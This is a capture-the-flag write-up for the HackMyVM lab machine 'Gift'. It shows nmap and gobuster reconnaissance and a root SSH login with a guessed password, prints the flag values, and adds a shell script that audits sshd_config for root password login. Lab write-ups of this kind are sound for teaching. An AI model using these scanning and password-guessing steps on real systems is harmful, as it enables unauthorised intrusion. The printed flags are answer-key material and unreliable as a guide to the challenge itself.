Gift

Target Machine Description

https://hackmyvm.eu/machines/machine.php?vm=Gift


Host Discovery

┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-23 10:32 CST
Nmap scan report for 192.168.2.1
Host is up (0.00045s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00073s latency).
MAC Address: 08:00:27:51:E4:3B (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.36
Host is up (0.00062s latency).
MAC Address: 08:00:27:08:75:F7 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.13 seconds

IP address: 192.168.2.36

Nmap Scan

1. Full port scan

┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -p- 192.168.2.36
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-23 10:32 CST
Nmap scan report for 192.168.2.36
Host is up (0.0013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:08:75:F7 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 10.89 seconds

Open ports: 22, 80

2. Detailed port and service scan

┌──(root㉿kali)-[~]
└─# nmap -sT -sV -sC -O --min-rate 10000 -p22,80 192.168.2.36
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-23 10:33 CST
Nmap scan report for 192.168.2.36
Host is up (0.00072s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey:
| 3072 2c:1b:36:27:e5:4c:52:7b:3e:10:94:41:39:ef:b2:95 (RSA)
| 256 93:c1:1e:32:24:0e:34:d9:02:0e:ff:c3:9c:59:9b:dd (ECDSA)
|_ 256 81:ab:36:ec:b1:2b:5c:d2:86:55:12:0c:51:00:27:d7 (ED25519)
80/tcp open http nginx
|_http-title: Site doesnt have a title (text/html).
MAC Address: 08:00:27:08:75:F7 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.63 seconds

Web Penetration

1. Visit port 80

Hint: Don't overthink. Really, it's simple.

2. Directory brute-forcing

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.2.36 -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.2.36
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,bak,txt,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 57]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

No other directories were found.

Attempting SSH Login

Try using simple as the login credential.

┌──(root㉿kali)-[~]
└─# ssh root@192.168.2.36
The authenticity of host '192.168.2.36 (192.168.2.36)' can't be established.
ED25519 key fingerprint is SHA256:dXsAE5SaInFUaPinoxhcuNloPhb2/x2JhoGVdcF8Y6I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.36' (ED25519) to the list of known hosts.
root@192.168.2.36's password:
IM AN SSH SERVER
gift:~# id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialou

Successfully obtained root privileges.
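The login above worked because sshd accepted a password for the root account. As an added example (not part of the original writeup), this shell function checks an sshd_config for that condition; the sample configs are constructed, and the check assumes only the global section matters (Match blocks and Include files are not evaluated).

```shell
#!/bin/sh
# Added example: does this sshd_config let root log in with a password?
# Scope (assumption): global section only; Match blocks and Include files are not evaluated.

# effective_value KEYWORD DEFAULT FILE -> value sshd would use (first occurrence wins)
effective_value() {
    awk -v key="$1" -v def="$2" '
        BEGIN { key = tolower(key) }
        {
            line = $0
            sub(/^[ \t]+/, "", line)
            if (line == "" || line ~ /^#/) next      # blank line or comment
            split(line, f, /[ \t=]+/)
            kw = tolower(f[1])                       # keywords are case-insensitive
            if (kw == "match") exit                  # conditional section starts here
            if (kw == key) { print tolower(f[2]); found = 1; exit }
        }
        END { if (!found) print def }
    ' "$3"
}

# root_password_login FILE -> FAIL if root can authenticate with a password, else OK
root_password_login() {
    prl=$(effective_value PermitRootLogin prohibit-password "$1")   # OpenSSH default
    pwa=$(effective_value PasswordAuthentication yes "$1")          # OpenSSH default
    if [ "$prl" = "yes" ] && [ "$pwa" = "yes" ]; then
        echo FAIL
    else
        echo OK
    fi
}

# Constructed sample configs (not taken from the target machine).
tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT
printf '%s\n' 'PermitRootLogin yes' 'PasswordAuthentication yes' > "$tmp/weak"
printf '%s\n' '# hardened' 'permitrootlogin prohibit-password' 'PermitRootLogin yes' \
    'PasswordAuthentication no' 'Match Address 10.0.0.0/8' \
    '    PasswordAuthentication yes' > "$tmp/hardened"

echo "weak:     $(root_password_login "$tmp/weak")"
echo "hardened: $(root_password_login "$tmp/hardened")"
```

On a live host, `sshd -T` prints the effective configuration and is the authoritative source once Include files are involved.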

USER FLAG

gift:~# cat user.txt 
HMV665sXzDS

ROOT FLAG

gift:~# cat root.txt 
HMVtyr543FG

Gift
http://miao-sec.github.io/Hackmyvm/Gift/
Author: Miao
Published: June 24, 2025
License: BY-MIAO